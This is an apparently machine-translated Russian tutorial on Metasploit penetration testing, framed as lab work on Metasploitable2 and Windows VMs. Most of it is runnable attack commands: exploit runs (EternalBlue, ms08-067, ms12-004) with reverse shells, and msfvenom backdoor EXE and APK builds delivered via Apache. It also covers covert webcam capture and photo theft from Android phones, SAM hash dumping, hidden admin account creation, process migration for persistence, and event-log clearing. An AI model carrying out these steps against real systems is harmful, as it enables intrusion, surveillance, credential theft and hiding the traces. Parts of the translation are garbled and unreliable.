Введение во взлом игрушек — 4. Сканирование уязвимостей и Metasploit
Введение во взлом игрушек — 4. Сканирование уязвимостей и Metasploit

1. Инструмент сканирования и анализа уязвимостей Legion.

Legion — это ответвление Sparta, простой в использовании, супермасштабируемой, полуавтоматической среды для тестирования на проникновение в сеть с открытым исходным кодом. Это инструмент приложения Python с графическим интерфейсом, по умолчанию интегрированный в систему Kali Linux. Legion — это набор инструментов, таких как Nmap, Nikto и Hydra. Он использует отличные функции каждого инструмента для выполнения таких задач, как сбор информации, сканирование и взрывная обработка.

Legion в основном включает в себя следующие функции: сканирование портов, программа автоматически вызывает Nmap для сканирования, а на основе результатов сканирования Nmap nikto автоматически загружает результаты для проведения более точного сканирования. На основе результатов сканирования используются специальные инструменты, такие как очистка каталогов dirbuster и webslayer для снятия веб-отпечатков пальцев. Для портов, которые можно взломать методом грубой силы, вызовите гидру для взлома методом грубой силы. Давайте посмотрим, как использовать этот инструмент:

Сначала мы авторизуемся в Metasploitable2 и получаем его IP-адрес с помощью команды ifconfig. Затем

Откройте инструмент Легион. Затем введите sudo legion, чтобы запустить инструмент.

Нажмите знак плюса.

Просто введите здесь IP-адрес, к которому вы хотите проникнуть, а затем нажмите кнопку «Отправить».

2. Эксплойт уязвимости searchsploit

первый,Ребята, пожалуйста, сначала напишите адрес.:https://www.exploit-db.com/。Он специально используется для сбора различныхлазейкивеб-сайт。существоватьkaliсистемасередина,Имеется локальная копия базы данных поиска лазейки.,Мы можем вводить команды в окне терминала для поиска.

Это команда searchsploit, ее общие параметры следующие:

  1. -c, --case [Термин]: выполнить поиск с учетом регистра. Поиск по умолчанию не учитывает регистр.
  2. -e, --exact [Term]: выполнить ТОЧНОЕ сопоставление заголовков эксплойтов (по умолчанию — AND).
  3. -j, --json [Term]: отображать результаты в формате JSON.
  4. -m, --mirror [EDB-ID]: скопировать зеркало приложения лазейки в текущий рабочий каталог.
  5. -o, --overflow [Term]: заголовку эксплойта разрешено переполнять столбцы.
  6. -p,--path [EDB-ID]: отображает полный путь к эксплойту лазейки. Если возможно, Также добавьте путь копирования на монтажный стол.
  7. -t,--title [Термин]: Искать только по заголовку лазейки,По умолчанию это заголовок и путь к файлу.
  8. -u, --update [Term]: проверить наличие и установить все обновления пакета эксплойта-db.
  9. -w, --www [Term]: отображать URL-адрес эксплойта-db.com вместо локального пути (поиск в Интернете).

Давайте посмотрим на пример ниже:

  1. searchsploit -t oracle Windows: заголовок поиска содержит Oracle windowsизлазейки。
  2. searchsploit -p 3389: Поиск лазейки по номеру 3389.
  3. searchsploit mysql: Найдите лазейки MySQL.
  4. searchsploit apple: Найдите лазейки Apple.

упражняться:

  1. Нам нужно легко установить программное обеспечение для обмена файлами Win7, которое позволяет посетителям легко загружать файлы через браузер.、Файлообменная система для скачивания файлов.
  2. После завершения установки,мы можем в калисистеме,от searchsploit easy file Команда общего доступа для просмотра некоторых функций программного обеспечения.
  1. Затем мы находим /usr/share/exploitdb/exploits/windows/remote/. Файл 39009.py по этому адресу.
  1. Поскольку это скрипт Python, для его выполнения мы используем команду Python. Полная команда выглядит следующим образом: python /usr/share/exploitdb/exploits/windows/remote/39009.py xxx.xxx.xxx.xxx 80.
  2. Затем нажмите Enter и вы обнаружите, что калькулятор в Windows 7 открыт. Это означает, что вторжение вашего скрипта прошло успешно.

3. Введение в Metasploit

Metasploit восхваляется в отрасли как инструмент, способный взломать всю вселенную. Хотя это немного преувеличено, этого достаточно, чтобы показать, насколько мощный Metasploit. Metasploit на данный момент является самым популярным, Самая мощная и масштабируемая платформа для тестирования на проникновение. Первая версия была выпущена HD Moore в 2003 году и переписана на языке Ruby в 2007 году. Позже, после приобретения Rapid7, он был разделен на несколько версий: платных и бесплатных. Metasploitиз Официальный сайт:https://www.metasploit.com/

Мы можем найти это программное обеспечение в системе Kali:

После нажатия введите системный пароль root. Подождав некоторое время, он будет выглядеть так:

4. Metasploit: сканирование портов

Экспериментальный дрон: Metasploitable2.

  1. Используйте Nmap для сканирования, nmap xxx.xxx.xxx.xxx.
  2. Используйте модуль Metasploit для сканирования и поиска портов.
  3. use auxiliary/scanner/portscan/tcp。
  4. показать опции, просмотреть параметры, которые необходимо установить.
  5. set rhosts xxx.xxx.xxx.xxx。
  6. Затем введите Заказ: выполнить. Вот и все.

5. Metasploit: сканирование SMB

Экспериментальный дрон-мишень: win7.

SMB, полное имя — Server Message Block, то есть блок служебной информации, который является именем протокола. Его можно использовать для веб-ссылок и передачи информации между клиентами и серверами. Сканируя SMB, можно идентифицировать системную информацию цели.

  1. search smb。
  2. use auxiliary/scanner/smb/smb_version。
  3. set rhosts xxx.xxx.xxx.xxx。
  4. run。

6. Metasploit: идентификация сервиса

Экспериментальный дрон-мишень: Linux.

Сканируйте сервер на наличие служб SSH.

  1. search ssh。
  2. use auxiliary/scanner/ssh/ssh_version。
  3. set rhosts xxx.xxx.xxx.xxx。
  4. run。

7. Metasploit: анализ сети

Получите пароль FTP.

Нам нужен смоделированный пользователь: win7. Требуется экспериментальная целевая машина: Windows Server 2008 (со службой FTP).

  1. используйте вспомогательный/сниффер/пснаффл, используйте модуль прослушивания.
  2. sudo su, если разрешений недостаточно, смените пользователей.
  3. Введите msfconsole, чтобы запустить Metasploit.
  4. Затем используйте модуль и запустите его.

8. Metasploit: сканирование и перечисление SNMP

SNMP — это стандартный протокол, специально разработанный для управления сетевыми узлами (серверами, рабочими станциями, маршрутизаторами, коммутаторами и т. д.) в IP-сетях. Это протокол прикладного уровня. Службу SNMP, включенную по умолчанию, можно увидеть на различных сетевых устройствах, от коммутаторов до маршрутизаторов, от межсетевых экранов до сетевых принтеров, без исключения.

Это экспериментальный дрон-мишень: Metasploitable2.

По умолчанию служба SNMP Metasploitable2 прослушивает только локальный хост. Поэтому нам нужно внести некоторые изменения в конфигурацию целевого дрона по умолчанию.

  1. cd /etc/default/snmpd。
  2. Затем отредактируйте его через vim и измените IP-адрес snmpd.pid на 0.0.0.0.
  3. Затем, как и раньше, найдите модули, связанные с snmp: найдите snmp_login.
  4. Затем используйте вспомогательный/сканер/snmp/snmp_login.
  5. Затем устанавливается ip. Затем идет бег. Законченный
  6. Мы также можем использовать модуль вспомогательный/scanner/snmp/snmp_enum. Я не буду повторять, как его использовать здесь.

9. Metasploit: сканирование хостов со слабыми паролями

Экспериментальный дрон-мишень: несколько окон.

Используемый модуль: вспомогательный/сканер/smb/smb_login.

Просто знайте диапазон IP-адресов и сканируйте пакетно.

10. Metasploit: идентификация VNC

VNC (Виртуальная сетевая консоль) — это аббревиатура виртуальной сетевой консоли. Это отличное программное обеспечение для дистанционного управления. VNC — это бесплатное программное обеспечение с открытым исходным кодом, основанное на операционных системах UNIX и Linux. Оно обладает мощными возможностями удаленного управления, является эффективным и практичным, а его производительность сравнима с любым программным обеспечением удаленного управления в Windows и Mac. В Linux VNC включает следующие четыре команды:

  1. vncserver
  2. vncviewer
  3. vncpasswd
  4. vncconnect

В большинстве случаев необходимы только две команды 1 и 2.

Экспериментальный дрон: Metaspolitable2.

  1. use auxiliary/scanner/vnc/vnc_none_auth。
  2. set rhosts xxx.xxx.xxx.xxx。
  3. run。

Затем мы попробуем взломать пароль VNC.

  1. use auxiliary/scanner/vnc/vnc_login。
  2. set rhosts xxx.xxx.xxx.xxx。
  3. run。

Затем у нас есть пароль и пытаемся войти с помощью vnc.

  1. Откройте новый терминал.
  2. Затем введите vncviewer xxx.xxx.xxx.xxx.
  3. Введите взломанный пароль для удаленного подключения.

11. Сканирование уязвимостей веб-сайта Wmap

Wmap сам по себе не является автономным сканером уязвимостей, а служит модулем Metasploit. В сочетании с модулями веб-уязвимостей и веб-службами они работают вместе, выполняя задачу сканирования целевого сервера. Результаты сканирования не создают автоматически отчеты, а сохраняются непосредственно в базе данных Metasploit.

  1. загрузить wmap: загрузить wmap
  2. wmap_sites -a http://xxx.xxx.xxx.xxx/mutillidae/: добавьте сайт сканирования в wmap.
  3. wmap_sites -l: просмотреть добавленные сайты.
  4. wmap_targets -d 0: Установить целевые сайты со сканированием на основе идентификатора добавленного сайта.
  5. wmap_targets -l: проверить целевые хосты, которые были просканированы.
  6. wmap_run -e: выполнить тесты.
  7. vulns: После завершения сканирования используйте команды Metasploit для проверки записей лазейки.
  8. wmap_vulns -l。

Реальный бой:

  1. Сначала введите IP-адрес виртуальной машины Metasploitable2, которую вы включили в браузере Kali. Местоположение может различаться в разных версиях браузеров, но вы обязательно сможете его найти.
  1. Тогда вы увидите такую ​​гиперссылку.
  1. Нажмите гиперссылку, чтобы перейти на веб-сайт. Это веб-сайт, который мы хотим просканировать.
  1. Затем выполните: wmap_sites -a http://xxx.xxx.xxx.xxx/mutillidae/Заказ。
  2. Затем выполните: wmap_sites -л. Проверьте идентификатор номера.
  3. Затем выполните тест: wmap_run -e.
  4. Подождав, вы можете передать vulns, а затем wmap_vulns. -l команда для просмотра лазейки.

12. Удаленное выполнение кода Metasploit

Экспериментальный дрон: Windows Server 2008/Windows 7.

  1. найдите ms17-010. мс: Майкрософт. 17:17 лет. 010: Десятый.
  2. Затем выполните: используйте эксплойт/windows/smb/ms17_010_eternalblue.
  3. Установите соответствующие параметры:
    • set rhosts xxx.xxx.xxx.xxx。
    • set payload windows/x64/shell/reverse_tcp。
    • set lhost xxx.xxx.xxx.xxx。
  4. run。

13. Metasploit: использование уязвимостей браузера для удаленного выполнения кода.

Экспериментальный дрон: Windows XP. Эксплойт: ms12-004.

  1. search ms12-004。
  2. use exploit/windows/browser/ms12_004_midi。
  3. установите srvhost xxx.xxx.xxx.xxx (текущий IP-адрес хоста).
  4. set payload windows/x64/shell/reverse_tcp。
  5. set lport 6666。
  6. run。
  7. Затем, после успешного мониторинга, будет сгенерирован случайный адрес. Откройте этот адрес в Windows. Вернувшись в командную строку Kali, вы можете просмотреть ее сеанс.
  8. Затем введите Заказ:сессии.
  9. Затем используйте session:sessions -i [идентификатор сеанса].
  10. Тогда вы можете войти.

14. Metasploit: уязвимости и повышение привилегий

Экспериментальный дрон: Windows XP.

Обязательным условием является то, что должен быть сеанс сеанса.

  1. search ms08-067。
  2. use exploit/windows/smb/ms08_067_netapi。
  3. set rhosts xxx.xxx.xxx.xxx。
  4. set lport 5555。
  5. run。
  6. sessions。
  7. search 14-002。
  8. use exploit/windows/local/bthpan。
  9. set session [session id]。
  10. set payload windows/meterpreter/reverse_tcp。
  11. set lport 6666。
  12. run。

Другие модули:

  1. exploit/windows/local/ms13_053_schlamperei
  2. exploit/windows/local/ms13_081_track_popup_menu

15. Metasploit: создание бэкдора

Прежде всего, поддерживаются бэкдоры, такие как Windows, Linux, Java, php и Android. эй-эй.

1. Создать бэкдор Windows

Заказ:

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx (локальный IP-адрес) lport=5555 -f exe -o /home/kali (каталог пользователя в вашем домашнем каталоге)/payload.exe
  2. msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx (локальный IP-адрес) lport=5555 -i 3 -e x86/shikata_ga_nai -f exe -o /home/kali (каталог пользователя в вашем домашнем каталоге)/payload.exe

Msfvenom:

  1. msfvenom --перечислить арки, просмотреть поддерживаемые архитектуры.
  2. msfvenom --list платформы, проверьте поддерживаемые платформы.
  3. msfvenom -l payload, просмотреть все доступные полезные нагрузки.
  4. msfvenom -l форматы, просмотрите все выходные форматы.
  5. msfvenom -l encrypt, просмотреть все методы шифрования.
  6. msfvenom -l кодировщики, просмотреть все декодеры.

упражняться:

  1. Сначала введите первую команду из приведенных выше, а затем вы увидите файл payload.exe в вашем домашнем каталоге/XXX.
  2. Затем нам нужно запустить apache. Служить: sudo service apache2 start.
  3. Затем в виртуальной машине Windows,Доступ к IP-адресу Kali можно получить через браузер.,Apache Служить будет напечатан.
  4. Затем мы генерируемизexeдокументкопироватьприезжатьwindowsсередина。
    1. Удалить домашнюю страницу Apache,Передайте payload.exeкопировать. (Хотите щелкнуть правой кнопкой мыши, чтобы удалить,Обнаружил, что не могу удалить,Все в порядке,использовать Заказ Удалить строку)
      • cd /var/www/html。
      • sudo rm index.nginx-debian.html
      • sudo rm index.html
      • sudo cp /home/xx(ваше имя пользователя)/payload.exe /var/www/html/
    2. Затем обновите браузер Windows по адресу только сейчас, вы увидите файл, а затем сохраните его на локальном рабочем столе.
  5. ОткрытьMetasploit。(Прямо сейчасизpayload.exeЭквивалентноНа управляемой стороне нам также необходимо использовать его совместно с основной управляющей стороной.)。Настройка модулей и параметров использования:
    1. use exploit/multi/handler
    2. set payload windows/meterpreter/reverse_tcp
    3. установите lhost xxx.xxx.xxx.xxx (IP-адрес вашего хоста)
    4. set lport 5555
    5. run
  6. Затем появляется следующее имя хоста командной строки, указывающее, что мы добились успеха:
2. Создайте бэкдор Android

Экспериментальный дрон: эмулятор Android.

Общий процесс очень похож на бэкдор Windows, но используемые модули немного отличаются. Нам нужно изменить некоторую конфигурацию:

  1. Измените режим сетевого подключения калисистемы на режим моста.,Поскольку эмулятор Android установлен на физическом хосте,Режим моста уже обсуждался ранее, и я не буду здесь говорить больше.
  1. Установите эмулятор Android вместо Tencent Mobile Game Assistant, который больше ориентирован на игры. Подойдет установка ночного бога или чего-то еще. Обратите внимание, что он установлен на вашем физическом компьютере.
  2. Затем введите: sudo ifconfig. Мы обнаружим, что IP-адрес изменился.

Эксперимент начинается:

  1. msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx (локальный IP-адрес) lport=5555 R>/home/kali(тыизhomeв каталогеизиспользовать户目录)/payload.apk
  2. Запускаем Apache. Служить аналогично: sudo service apache2 start.
  3. Затем введите IP-адрес вашей виртуальной машины Kali в браузере эмулятора Android.
  4. Поместите установочный пакет apk скопировать в каталог apache: sudo cp /home/zakingwong/payload.apk /var/www/html/.
  5. Обновите каталог эмулятора Android. Нашел новый apk-файл.
  6. Та же операция, что и в Windows: скачать APK и установить APK.
  7. Затем откройте Metasploit.
  8. Используйте модуль хоста, как и в Windows: используйте эксплойт/мульти/обработчик.
  9. set payload android/meterpreter/reverse_tcp。
  10. установите lhost xxx.xxx.xxx.xxx (IP-адрес вашего хоста)。
  11. set lport 5555。
  12. run

Тогда вы можете делать то, что хотите.

3. Удаленно управляйте своим телефоном Android и вызывайте камеру, чтобы делать снимки.
  1. webacm_list, проверь, какие камеры там стоят.
  2. webacm_snap, сделать снимок с указанной камеры:
    • -h: Отобразить справку.
    • -i: порядковый номер используемой веб-камеры.
    • -p: путь к файлу изображения JPEG. По умолчанию используется HOME/[случайное искаженное имя].jpeg.
    • -q: качество изображения JPEG, по умолчанию — 50.
    • -v: автоматически просматривать изображения JPEG, по умолчанию установлено значение «истина».
  3. webcam_stream: Воспроизведение видеопотока с указанной веб-камеры.
  4. Затем поиграйтесь с командами самостоятельно.
  5. Дружеское напоминание,Телефон Android подключен к Wi-Fi,Вы можете играть так. так,Не делайте плохих вещей! ! ! ! Незаконно! ! !
4. Удаленно управляйте телефонами Android, загружайте и скачивайте файлы.

Давайте сначала узнаем о файловой системе Заказ:

  1. cat, читает и выводит на стандартный вывод.
  2. cd, сменить каталог.
  3. контрольная сумма, извлекает контрольную сумму файла.
  4. cp, переместите исходный файл копировать в целевую папку.
  5. dir, файл списка, псевдоним ls.
  6. скачать, загрузить из целевой системы файл.
  7. eidt, редактируйте файлы с помощью vim.
  8. getlwd, распечатать локальный каталог.
  9. getwd печатает рабочий каталог.
  10. lcd, измените локальный каталог.
  11. lls, перечисляет локальные файлы.
  12. lpwd печатает локальный рабочий каталог.
  13. ls — список файлов.
  14. mkdir создает каталог.
  15. mv перемещает исходные файлы в целевой каталог.
  16. pwd, выходной рабочий каталог.
  17. rm, удалить файлы.
  18. поиск, поиск файлов.
  19. загружать, загружать файлы или каталоги.

Попрактикуйтесь в скачивании и загрузке файлов с мобильного телефона. Вы можете попробовать это сами:

  1. cd /
  2. ls
  3. cd sdcard
  4. ls
  5. cd DCIM
  6. ls
  7. cd Camera
  8. download 1.jpeg
5. Удаленно управляйте телефонами Android для определения позиционирования.

Существует множество специфических команд Android, поэтому я не буду здесь вдаваться в подробности. Если вам интересно, вы можете проверить их на Baidu самостоятельно. Тогда позиционирование будет очень простым, просто используйте команду геолокации.

16. Meterpreter: файловая система доступа Windows

  1. Сначала измените режим сетевого подключения на режим NAT.
  2. EXE-файл создается перед запуском Windows. Если вы не знаете, что произошло, оглянитесь назад.
  3. Откройте главный терминал управления калисистемой: используйте эксплойт/мульти/обработчик.
  4. set payload windows/meterpreter/reverse_tcp。
  5. set lport 6666。
  6. установите lhost xxx.xxx.xxx.xxx (IP-адрес главного терминала управления).
  7. run。
  8. Как и раньше, управляемый терминал устанавливает exe-файл.
  9. После этого вы сможете управлять системным файлом Windows. Соответствующие команды аналогичны предыдущим командам в части Android. Здесь особо нечего сказать.

17. Meterpreter: повышение привилегий Windows и получение учетных данных

иногда,ты可能会发现自己изMeterpreterТема разговораприезжать了использовать户权限изпредел。Изменить реестр、Такие действия, как установка бэкдоров или экспорт паролей, требуют повышенных привилегий пользователя.。иMeterpreterпредоставил намgetsystemЗаказ,Повышение прав может быть достигнуто.

кроме того,getuidМожно получить токизиспользовать户信息,system — высший орган системы. Если вы все еще не можете получить его с помощью системной команды,Затем вы сможете использовать лазейки, которые вы изучили ранее, чтобы повысить свои привилегии.

Давайте посмотрим на практические шаги по повышению привилегий уязвимости:

  1. search ms13-053。
  2. use exploit/windows/local/ms13_053_schlamperei。
  3. Затем нам нужно настроить сеанс. Я не буду говорить о том, что я узнал раньше.
  4. set session 1。
  5. set payload windows/meterpreter/reverse_tcp。
  6. set lport 6666。
  7. run。

После повышения привилегий,Можетпроходитьhashdumpмодуль,Экспортируйте локальные учетные записи из базы данных SAM. Выходной формат данных:

Язык кода:javascript
копировать
Имя пользователя: SID: Хэш LM: Хэш NTLM:::

18. Meterpreter: запущенные программы Windows и снимки экрана.

Быстрое выполнение командных сценариев. Содержимое выполняемой команды каждый раз практически одинаково, поэтому мы можем создать файл.

1. Затем щелкните правой кнопкой мыши и выберите «Открыть с помощью коврика для мыши».

2. Затем мы можем записать в этот скрипт наши часто используемые команды. Содержание следующее:

Язык кода:javascript
копировать
use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.129

set lport 5555

3. Затем сохраните файл.

  4. Откройте Метасплоит. Введите так Заказ:ресурс /home/(ваше имя пользователя)/windows_control.

5. Скрипт запустится.

6. Затем бегите прямо.

7. Просто снова откройте управляемый терминал.

1. Запустите программу

Команда выполнения может запускать приложения в целевой системе. Команда используется следующим образом:

  1. execute -f <file> [Options]
    • -H, создает скрытый процесс.
    • -a, параметры, передаваемые команде.
    • -я, взаимодействую с процессом.
    • -m, выполнить из памяти.
    • -t запускает процесс, используя текущий токен поддельного потока.
    • -s, выполнить процесс в данном сеансе.

Тогда хахахахаха, мы можем попробовать этот заказ: выполните -f Calc.exe. Откройте калькулятор Windows.

2. Скриншот

Команда скриншота, чтобы сделать снимок экрана и сохранить его в Kali.

Команда screenshare может выполнять мониторинг в реальном времени.

19. Meterpreter: создайте новую учетную запись и включите удаленный рабочий стол в Windows.

1. Создайте новую учетную запись

Через скрипт getgui используйте параметры -u и -p, назначьте ему права администратора, а затем добавьте его в группу «Пользователи удаленного рабочего стола».

Язык кода:javascript
копировать
run getgui -u hack -p pass123

Примечание. Если ваши разрешения не являются СИСТЕМНЫМИ, вам необходимо использовать метод, который вы изучили ранее, для повышения ваших разрешений. После повышения привилегий используйте приведенную выше команду для создания пользователя.

2. Включите удаленный рабочий стол.

Если у пользователя не включается функция удаленного рабочего стола, можно использовать:

Язык кода:javascript
копировать
run getgui -e

чтобы включить удаленный рабочий стол.

Перед запуском удаленного рабочего стола,Нам также необходимо использоватьidletimeЗаказ检查远程использовать户изсвободное время,Это снижает ваши шансы быть обнаруженным.

Затем мы выполняем: rdesktop [ваш целевой IP: 3389] в новом терминале.

Тогда, возможно, у созданного вами пользователя недостаточно прав. Затем вы можете выполнять команды оболочки в Meterpreter.,То есть откройте терминал целевого хоста, которым вы управляете.,Выполните следующий заказ:

администраторы net localgroup взломать/добавить. Хитростью здесь является имя пользователя, которое вы создали ранее.

20. Meterpreter: привязка процессов Windows и очистка журналов событий.

1. Привязка процесса

Meterpreter может обеспечить постоянство путем привязки к другим процессам.

  1. Используйте команду ps для просмотра запущенных процессов. (Разумеется, нужно через ранее написанный скрипт связать основной терминал управления и управляемый терминал и войти в Meterpreter)
  2. Используйте команду getpid, чтобы получить текущий процесс вашего сценария взлома.
  3. Тогда мы просто находим одинpsЛиния готоваиз Привязка процесса。использоватьmigrate [pid]Заказ Вот и все。
  4. При проверке pid он станет привязанным pid.
2. Очистить журналы

МожетпроходитьclearevЗаказочистить журнал。

PS: мы можем щелкнуть правой кнопкой мыши компьютер-> Управление-> Просмотр событий-> Журнал Windows. для просмотра журнала.

boy illustration
Неразрушающее увеличение изображений одним щелчком мыши, чтобы сделать их более четкими артефактами искусственного интеллекта, включая руководства по установке и использованию.
boy illustration
Копикодер: этот инструмент отлично работает с Cursor, Bolt и V0! Предоставьте более качественные подсказки для разработки интерфейса (создание навигационного веб-сайта с использованием искусственного интеллекта).
boy illustration
Новый бесплатный RooCline превосходит Cline v3.1? ! Быстрее, умнее и лучше вилка Cline! (Независимое программирование AI, порог 0)
boy illustration
Разработав более 10 проектов с помощью Cursor, я собрал 10 примеров и 60 подсказок.
boy illustration
Я потратил 72 часа на изучение курсорных агентов, и вот неоспоримые факты, которыми я должен поделиться!
boy illustration
Идеальная интеграция Cursor и DeepSeek API
boy illustration
DeepSeek V3 снижает затраты на обучение больших моделей
boy illustration
Артефакт, увеличивающий количество очков: на основе улучшения характеристик препятствия малым целям Yolov8 (SEAM, MultiSEAM).
boy illustration
DeepSeek V3 раскручивался уже три дня. Сегодня я попробовал самопровозглашенную модель «ChatGPT».
boy illustration
Open Devin — инженер-программист искусственного интеллекта с открытым исходным кодом, который меньше программирует и больше создает.
boy illustration
Эксклюзивное оригинальное улучшение YOLOv8: собственная разработка SPPF | SPPF сочетается с воспринимаемой большой сверткой ядра UniRepLK, а свертка с большим ядром + без расширения улучшает восприимчивое поле
boy illustration
Популярное и подробное объяснение DeepSeek-V3: от его появления до преимуществ и сравнения с GPT-4o.
boy illustration
9 основных словесных инструкций по доработке академических работ с помощью ChatGPT, эффективных и практичных, которые стоит собрать
boy illustration
Вызовите deepseek в vscode для реализации программирования с помощью искусственного интеллекта.
boy illustration
Познакомьтесь с принципами сверточных нейронных сетей (CNN) в одной статье (суперподробно)
boy illustration
50,3 тыс. звезд! Immich: автономное решение для резервного копирования фотографий и видео, которое экономит деньги и избавляет от беспокойства.
boy illustration
Cloud Native|Практика: установка Dashbaord для K8s, графика неплохая
boy illustration
Краткий обзор статьи — использование синтетических данных при обучении больших моделей и оптимизации производительности
boy illustration
MiniPerplx: новая поисковая система искусственного интеллекта с открытым исходным кодом, спонсируемая xAI и Vercel.
boy illustration
Конструкция сервиса Synology Drive сочетает проникновение в интрасеть и синхронизацию папок заметок Obsidian в облаке.
boy illustration
Центр конфигурации————Накос
boy illustration
Начинаем с нуля при разработке в облаке Copilot: начать разработку с минимальным использованием кода стало проще
boy illustration
[Серия Docker] Docker создает мультиплатформенные образы: практика архитектуры Arm64
boy illustration
Обновление новых возможностей coze | Я использовал coze для создания апплета помощника по исправлению домашних заданий по математике
boy illustration
Советы по развертыванию Nginx: практическое создание статических веб-сайтов на облачных серверах
boy illustration
Feiniu fnos использует Docker для развертывания личного блокнота Notepad
boy illustration
Сверточная нейронная сеть VGG реализует классификацию изображений Cifar10 — практический опыт Pytorch
boy illustration
Начало работы с EdgeonePages — новым недорогим решением для хостинга веб-сайтов
boy illustration
[Зона легкого облачного игрового сервера] Управление игровыми архивами
boy illustration
Развертывание SpringCloud-проекта на базе Docker и Docker-Compose